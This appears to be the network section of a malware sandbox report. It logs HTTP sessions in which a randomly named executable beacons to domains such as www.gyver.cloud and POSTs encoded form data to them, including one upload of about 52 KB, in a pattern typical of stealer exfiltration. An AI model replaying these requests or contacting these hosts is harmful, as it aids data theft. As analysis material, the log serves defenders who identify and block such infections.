                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.11.2049855154.23.184.218805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:05.969963074 CEST522OUTGET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.23ddv.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:50:06.271667957 CEST312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:50:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66a4f874-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.11.204985676.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:11.394592047 CEST785OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.11.204985776.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:14.034516096 CEST1125OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4d 34 66 6f 53 53 70 36 31 5a 45 47 4d 6a 5a 37 6f 37 77 59 76 72 68 31 57 2f 30 2b 5a 42 45 55 47 6d 31 72 68 43 6b 38 76 4e 5a 64 38 41 35 51 34 61 4e 61 6d 63 51 69 7a 65 35 2b 35 62 45 36 39 4f 49 66 63 42 32 65 34 35 42 31 5a 58 50 78 51 46 67 2f 61 47 59 50 38 4e 6e 4b 76 55 4c 62 75 58 4c 79 6b 41 47 57 4a 37 5a 59 46 65 67 66 52 41 34 6b 54 72 71 6d 35 77 35 31 47 50 72 6a 58 58 69 4d 36 4c 4f 44 73 4e 6c 70 5a 79 54 43 51 63 53 6d 63 78 61 72 67 72 71 78 4f 66 4f 64 47 4e 66 72 65 43 5a 6a 66 37 41 72 42 74 2f 76 4f 68 6f 34 73 5a 57 6f 36 66 57 50 52 67 4d 54 39 76 50 30 37 39 39 4a 6e 45 59 30 53 7a 79 41 5a 65 41 67 46 4e 46 68 55 33 75 56 5a 6d 68 33 73 57 41 35 61 49 51 4f 46 7a 65 79 4d 46 48 76 54 5a 73 45 72 45 50 70 72 68 34 51 7a 37 65 68 63 32 74 53 54 70 46 54 4f 65 36 42 6a 2b 6a 69 64 79 4e 75 57 79 54 47 4d 44 69 44 39 66 4b 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2M4foSSp61ZEGMjZ7o7wYvrh1W/0+ZBEUGm1rhCk8vNZd8A5Q4aNamcQize5+5bE69OIfcB2e45B1ZXPxQFg/aGYP8NnKvULbuXLykAGWJ7ZYFegfRA4kTrqm5w51GPrjXXiM6LODsNlpZyTCQcSmcxargrqxOfOdGNfreCZjf7ArBt/vOho4sZWo6fWPRgMT9vP0799JnEY0SzyAZeAgFNFhU3uVZmh3sWA5aIQOFzeyMFHvTZsErEPprh4Qz7ehc2tSTpFTOe6Bj+jidyNuWyTGMDiD9fKN8YvqjtWW6vnv2Xp9OT3E46XHXNaVhbQeipRJtAzOeb5PCGK4+inyFq7/0L3lASkw3njdv7tbWTwWWdGJTXs5NzeasL6uscKjQEkffeiBx8kIDSB1J+Al3URlLka2s7mGoyYoarn5Mxey+ej8bewmfVEtz22LumxGptF0Mm2dr1MR6UtrIRpB/sFaZQEz7k/OirfP9MN0eiG43Q=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.11.204985876.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:16.675647020 CEST2578OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4b 67 66 70 6e 4f 70 36 55 5a 45 42 4d 6a 5a 33 49 37 78 59 76 72 47 31 57 32 2f 2b 5a 4e 2b 55 41 71 31 79 57 6d 6b 38 39 56 5a 4c 73 41 34 56 34 61 50 65 6d 64 4d 69 7a 62 2b 2b 34 2b 7a 37 4e 53 49 65 62 39 32 49 5a 35 43 32 4a 58 4e 78 51 46 73 30 36 47 6d 50 38 35 4a 4b 76 51 4c 62 73 54 4c 78 77 6f 47 46 6f 37 5a 66 56 65 6e 57 78 41 37 32 54 71 51 6d 35 31 41 31 47 50 56 6a 57 54 69 4d 36 72 4f 43 72 78 69 71 35 79 54 4c 77 63 52 33 73 31 65 72 67 47 70 78 4f 37 4f 64 42 4a 66 71 2b 43 5a 70 61 58 44 6a 42 74 39 69 75 67 79 75 73 64 65 6f 36 4b 6e 50 55 34 4d 53 4e 72 50 75 6f 56 39 46 6b 63 59 36 53 7a 77 50 35 65 58 72 6c 4d 65 68 55 47 48 56 59 48 55 33 76 36 41 6a 2b 55 51 46 45 7a 5a 78 73 46 42 32 6a 59 30 57 62 41 54 70 72 77 6e 51 7a 36 46 68 64 79 74 53 48 56 46 42 4d 32 39 4d 54 2f 72 71 39 79 45 37 6d 2b 4a 47 4d 50 71 44 2b 66 61 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2KgfpnOp6UZEBMjZ3I7xYvrG1W2/+ZN+UAq1yWmk89VZLsA4V4aPemdMizb++4+z7NSIeb92IZ5C2JXNxQFs06GmP85JKvQLbsTLxwoGFo7ZfVenWxA72TqQm51A1GPVjWTiM6rOCrxiq5yTLwcR3s1ergGpxO7OdBJfq+CZpaXDjBt9iugyusdeo6KnPU4MSNrPuoV9FkcY6SzwP5eXrlMehUGHVYHU3v6Aj+UQFEzZxsFB2jY0WbATprwnQz6FhdytSHVFBM29MT/rq9yE7m+JGMPqD+faN7gvqDtWUdzkhGXugeSuJY6mHXB3Vkj6dSFRIdQzEuavECGOzei62Fq7/0HJlAWk3GvjfdjtLRnwUWdAJTX95N/lasDlusMwjW8kfuuiC0QnNzSA/p+X6nROlLIs2sqEFaGY6q7nqcxd3eee27ecieodtz6MLuChGrtFkqL5MoRxNZAw2t4QW/kOQ5U48p4zJFPHRN0nmdm7rghsCuB+cIgsvzxbKRE01Wb1FYcQsfql7A/tgh/76/CycUUjbtPALjoIiA+cHUJrShC6Cx9GNREzSytVXwuBgCYNAA4ycTwEITp0E7BxZC1ACsax2/3drYI9/A0yluIIPGjMLmSSTe8iDCkYdtTyTAhMVTNV/ykAA3DTvchT0H6yuOaOD6qyFIs1Gg7PRm9gFCY5X/J6DNWr0B8PcS6taD95ootFDpHX7AuBvFLg7eUdeVhBLPbBizXCxrG7nLFnCkLcOhffbz2SQHjtO7vAWPeDHdCWvlkkBIvnKCO8RgXTUWMX+S60QdfSIkzKe0xX+zdlql0ZS2tmhEnVDdK3IdD5bmsewjlVV5mrIzxva7jDy5QG7TQa8mrTN6hC+fUqM+YSNL1u8LaacF9gxC1j0kdug+1bIy9Gg4yuMWek2QDeItqE7778Lt2CbDS+fHNijsmmZYfvtkqhL1Wuwzf7yQI [TRUNCATED]
                                                                                  Aug 27, 2024 17:50:16.675700903 CEST7734OUTData Raw: 71 35 6b 59 51 35 6d 43 50 4c 4a 51 79 53 4f 39 43 33 32 44 56 63 31 73 4f 37 59 45 63 43 78 33 61 6f 54 6e 4e 6b 6e 67 4d 70 53 33 44 54 41 6f 53 48 55 59 70 67 4e 52 41 54 72 6e 41 62 75 4e 6b 57 39 46 4c 4f 41 35 51 70 66 53 76 54 7a 52 53 68
                                                                                  Data Ascii: q5kYQ5mCPLJQySO9C32DVc1sO7YEcCx3aoTnNkngMpS3DTAoSHUYpgNRATrnAbuNkW9FLOA5QpfSvTzRShez6GKRjtuJ4t3ekY87yTMOwvYw8cErmB/kmgxu4f29k12u7Aox+uDP75CB5bx32lR8ljgjYwkjq/tGzeDPm1mnoAKE61Vg4mTKk9NoM2p6Mq4s9oY1UvT//jyYQOWUL1Aaj8cjxwWqrft2DR76Qgi2dovVLA0lR75
                                                                                  Aug 27, 2024 17:50:16.675751925 CEST2578OUTData Raw: 78 39 58 4f 6b 63 44 51 4b 76 6e 78 54 56 4c 63 7a 72 4f 47 49 45 42 47 34 54 62 6a 4a 57 69 4a 74 42 65 4c 7a 78 58 49 71 4b 54 2f 48 61 4a 61 53 57 39 39 62 78 58 56 4f 6e 6c 53 4b 31 4f 70 62 39 4c 57 6d 6c 48 53 42 79 4a 49 42 42 6c 42 46 4f
                                                                                  Data Ascii: x9XOkcDQKvnxTVLczrOGIEBG4TbjJWiJtBeLzxXIqKT/HaJaSW99bxXVOnlSK1Opb9LWmlHSByJIBBlBFOGf8KufCnlTLSOshFvCJQQQG1YMnhWbxVWW8rtOra5ppFZdO2W4bhHEf2mY6TLGH6qAJhg3Gc3g/AQoHxESz5g7ZkMZ0l5BszfOWIrHLe2oA50x8BfE5ltIM1qUImIqEK8rc7iv+Hiu0U4kvJ3fJu5LnCRmUkJ14En
                                                                                  Aug 27, 2024 17:50:16.776730061 CEST2578OUTData Raw: 51 46 71 73 39 6f 4d 53 55 37 30 57 62 51 2b 56 68 77 6a 63 57 39 73 6b 6c 45 70 69 44 4a 41 68 2b 79 2f 69 72 2f 74 47 45 57 39 67 46 4a 45 6e 2f 42 71 39 2b 65 42 46 72 78 76 6c 6b 62 57 48 30 35 53 36 2b 67 33 6f 2b 35 52 61 44 31 52 66 47 6f
                                                                                  Data Ascii: QFqs9oMSU70WbQ+VhwjcW9sklEpiDJAh+y/ir/tGEW9gFJEn/Bq9+eBFrxvlkbWH05S6+g3o+5RaD1RfGoQJWCqb7VI4BRPVwC7niHmklw2oxL1em3xBI4YDy3uTL2udaGQkI3cX9A4kISt3N5q3WnmdQkoBM7iX89Hdm6PlI+UeM2oNJ59qfleuCmLZRFfb6l/bYMWsgbxpEPZggvcn7vic8BZ9wato8AYjgaz42CZaGbNkkxp
                                                                                  Aug 27, 2024 17:50:16.776817083 CEST2578OUTData Raw: 42 67 4a 31 6f 48 47 74 30 41 5a 6e 7a 78 5a 56 70 58 77 67 4a 57 4e 44 59 71 62 6d 55 4a 51 54 36 38 41 58 6d 71 37 53 52 33 77 75 71 39 79 65 74 72 67 38 34 34 78 39 6f 62 4c 56 4e 4c 69 63 6a 49 4e 34 2f 45 64 51 74 6a 44 61 47 46 49 2b 50 6e
                                                                                  Data Ascii: BgJ1oHGt0AZnzxZVpXwgJWNDYqbmUJQT68AXmq7SR3wuq9yetrg844x9obLVNLicjIN4/EdQtjDaGFI+Pn5a22AtHVx8zrsfRcBRuDNTGq6xN4nyq2CvimJVeqjBUFHxtC1mu+FefByqva48g4Kg4Zf/gH/6msiguHaor5SSposi/Sn7e7zOYf+O0kXDoyAoHYhHSPboKNO4yL2AbnuxgRgPIr1i2FKMQXNKOBLmUAbrRw6obot
                                                                                  Aug 27, 2024 17:50:16.776999950 CEST2578OUTData Raw: 62 6c 42 6b 42 49 73 62 70 6a 4f 2f 65 69 33 36 7a 67 6c 38 74 65 43 30 71 43 36 36 51 49 72 31 42 58 31 36 31 50 4f 46 67 57 63 38 4a 77 39 77 58 52 31 35 77 5a 65 45 2b 4a 4e 35 55 79 62 50 50 50 58 55 30 56 64 78 67 52 54 75 73 39 64 6f 6e 76
                                                                                  Data Ascii: blBkBIsbpjO/ei36zgl8teC0qC66QIr1BX161POFgWc8Jw9wXR15wZeE+JN5UybPPPXU0VdxgRTus9donv/KO5oJal+ecvcQZptSLTpQvKo2WuWWXYzbpPZl4ItI5mswgNia60Z/0jcn3W5a3cU8XEEK4GcONdAmokkdHsAAvjc6BHiCUT+LLd4aRvndUiWS87DD78yq6MZPSuOQtCtZdRMX09gXHoVFccWZ+5POJP6HQLgHX6x
                                                                                  Aug 27, 2024 17:50:16.777158022 CEST7734OUTData Raw: 42 64 72 6b 33 45 35 38 36 7a 36 6f 35 54 6c 58 30 46 6e 78 7a 57 43 74 35 76 6e 34 35 65 43 4e 44 78 76 42 45 53 52 64 68 62 4e 2b 32 7a 66 2f 66 2f 70 34 70 7a 4e 6c 2b 74 67 70 66 70 77 52 31 39 54 45 4f 2f 30 69 50 2b 32 6b 52 69 39 6d 4d 6e
                                                                                  Data Ascii: Bdrk3E586z6o5TlX0FnxzWCt5vn45eCNDxvBESRdhbN+2zf/f/p4pzNl+tgpfpwR19TEO/0iP+2kRi9mMn4ER2tCEDA/L7g/hydgGLpiLOOt4wM5F4zeZNHiCWvhpZwsL59sR5JZS3IqNz49Kz3+EFbNhKsUH/B+tnTvkvCAWMO0+QjgvAnCfCIq6xbhL1P2api3X/ZK3MlvUhWBeRRKNrk80LE+nth0tDA0oRGtwJEkOg4lbK6
                                                                                  Aug 27, 2024 17:50:16.777499914 CEST10312OUTData Raw: 4e 58 52 2b 47 48 61 70 6b 65 34 53 43 2b 70 63 6d 6a 58 42 5a 4f 64 54 74 58 48 75 4b 34 4d 55 43 55 68 48 72 38 56 48 4c 4f 70 49 6b 4e 41 55 6e 34 66 78 45 6c 41 77 5a 78 66 66 66 53 79 72 62 51 57 5a 53 56 30 55 6a 35 7a 61 7a 74 30 45 69 6e
                                                                                  Data Ascii: NXR+GHapke4SC+pcmjXBZOdTtXHuK4MUCUhHr8VHLOpIkNAUn4fxElAwZxfffSyrbQWZSV0Uj5zazt0EinQicANcb03zvacBr0gdspASRMnS2zX08NgHyi8ZokBYengpBgGrLtFs8mXxV4d0/cpQAY7WDldk3Al06gPxa1qF/tqxkTtRH1e/WtHUmB59gkb9/kmawq1QOM/apI+XThcN39mCwC1X0lk63ismMrQpRYdSM+sc4EF
                                                                                  Aug 27, 2024 17:50:16.878113031 CEST1289OUTData Raw: 53 4e 4e 6e 4e 4e 57 62 44 6d 30 68 66 4a 73 37 51 75 53 62 4f 45 30 65 77 46 37 4c 65 6f 70 6d 55 41 64 63 47 36 67 30 78 52 30 59 4c 52 4e 71 52 44 61 59 6f 48 57 74 71 61 70 6a 79 75 72 58 52 58 52 35 33 35 41 38 71 63 4c 68 4f 4e 71 58 4e 7a
                                                                                  Data Ascii: SNNnNNWbDm0hfJs7QuSbOE0ewF7LeopmUAdcG6g0xR0YLRNqRDaYoHWtqapjyurXRXR535A8qcLhONqXNzaVP9MuIwEpuyvN8ntT9YPJZCFKsI/3eVyWI+tdE1zOzaochDNnTEIlaROxvyO+4Ol6Va1y2Egvxai0ClwZJVibPgLSSGFcbuwQjdRMSsk0mD2FRJ8M5OOLsOVLHmsbOKUcvlDUS23MEQrZPYC+tgxgF2fqQqZOgk6
                                                                                  Aug 27, 2024 17:50:16.878160954 CEST1289OUTData Raw: 77 41 56 44 35 51 70 61 4e 39 62 4f 4e 63 75 48 54 4d 69 72 7a 43 6d 62 41 57 77 50 5a 74 58 76 49 76 7a 56 6f 30 64 66 67 76 2b 75 55 4c 5a 62 39 49 67 71 45 66 48 39 77 70 6a 72 52 78 71 4a 32 32 4e 6a 78 50 6c 4a 76 44 65 6d 4f 64 46 30 63 37
                                                                                  Data Ascii: wAVD5QpaN9bONcuHTMirzCmbAWwPZtXvIvzVo0dfgv+uULZb9IgqEfH9wpjrRxqJ22NjxPlJvDemOdF0c729nFcFSWvsOMwwd7nd77TWWEjKLts96qEywDOKj0rctFFtVWmYjZhYvyglhOnO4ZwvajmUDol45ko7m8fwNS3HSLMsgAhx4d2Trv6wLwsqGEj2WUH5g2Z78hQZMrHRWLE9HSUGkoxCnXABxAR5v0S7QamRnyav1we
                                                                                  Aug 27, 2024 17:50:16.878212929 CEST2578OUTData Raw: 5a 55 2f 56 49 37 54 76 5a 46 68 77 72 79 69 65 51 4f 42 32 6c 6a 71 59 65 4d 47 73 77 55 6e 74 61 36 46 66 47 39 42 6c 76 55 71 4a 52 4f 62 32 6e 71 33 72 36 54 68 69 78 6e 4b 54 34 61 6a 4a 76 6f 4a 53 6d 47 65 43 68 4a 34 56 42 57 2f 59 65 6f
                                                                                  Data Ascii: ZU/VI7TvZFhwryieQOB2ljqYeMGswUnta6FfG9BlvUqJROb2nq3r6ThixnKT4ajJvoJSmGeChJ4VBW/YeoS3FGx8eJo6PNFw6tGG5Zyf/meMQjs7f1NCpGKxQr9FOG/UrOwUkSdamY9yvYmsZa545uJXlj9u1Bdb3CjuA1ggI8fo4jeX3pPwwigzHe72AXABzH0zVkwMtVZy+02yQQgQm5v6ZvilqAXXHBVDoSgl191Wa0kzJxu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.11.204985976.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:19.325340033 CEST524OUTGET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:50:19.428704023 CEST397INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Tue, 27 Aug 2024 15:50:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 257
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 64 66 79 38 37 61 66 54 43 35 35 59 56 76 7a 53 37 53 31 6a 77 4c 67 63 62 69 35 77 33 4a 48 7a 6a 61 76 61 78 44 51 61 31 39 64 42 30 33 6a 51 73 6b 59 43 41 38 72 2f 37 61 6e 42 42 2b 76 6f 75 54 2b 56 35 61 78 2b 58 6a 47 6b 75 52 48 73 36 75 73 34 42 63 42 46 51 66 58 4b 64 7a 4a 37 6a 31 54 6a 38 5a 47 4d 37 4a 6e 34 59 65 6c 45 46 36 46 31 35 66 51 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.11.2049860203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:24.631759882 CEST788OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 5a 4c 2b 73 41 33 4a 65 76 79 76 67 6f 78 66 49 36 51 62 73 44 34 56 59 30 5a 75 52 73 32 67 6e 6f 47 38 74 62 53 77 4e 69 44 64 53 72 4b 69 68 62 62 31 34 72 65 47 63 76 72 39 34 62 45 72 5a 53 32 6f 6c 59 7a 31 61 79 41 58 4d 6a 66 74 6c 48 56 57 66 74 6a 73 78 79 59 57 56 38 2f 66 79 57 67 71 65 41 45 38 7a 2f 77 73 41 6c 66 77 6c 67 51 39 77 47 57 7a 6e 73 6a 47 50 7a 59 79 58 6c 49 71 38 35 62 36 4b 34 4f 47 50 64 4b 6b 68 41 48 61 6e 50 54 2b 74 47 36 73 78 36 4f 54 4e 6e 36 36 51 37 74 74 57 46 31 4c 62 5a 31 2f 6f 79 4e 39 6c 59 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DZL+sA3JevyvgoxfI6QbsD4VY0ZuRs2gnoG8tbSwNiDdSrKihbb14reGcvr94bErZS2olYz1ayAXMjftlHVWftjsxyYWV8/fyWgqeAE8z/wsAlfwlgQ9wGWznsjGPzYyXlIq85b6K4OGPdKkhAHanPT+tG6sx6OTNn66Q7ttWF1LbZ1/oyN9lYg==
                                                                                  Aug 27, 2024 17:50:24.823091030 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:50:24 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
